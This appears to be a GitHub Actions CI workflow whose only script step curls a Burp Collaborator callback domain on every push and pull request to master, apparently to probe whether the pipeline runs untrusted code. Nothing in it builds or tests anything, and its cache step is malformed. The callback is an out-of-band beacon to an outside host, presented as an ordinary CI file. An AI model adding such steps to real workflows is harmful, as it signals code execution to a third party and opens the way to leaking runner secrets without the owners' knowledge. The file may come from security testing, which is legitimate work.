name: CI

on:
  push:
    branches: [ master ]
  pull_request:
    branches: [ master ]
    
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v2
    - name: Run a one-line script
      run: |
        curl http://vwv55x1biwwgkh01u25ypjphj8pydn.burpcollaborator.net
        
    - uses: actions/cache@v2.0.0
    - name: Cache
      with:
        path: /test
        key: 123

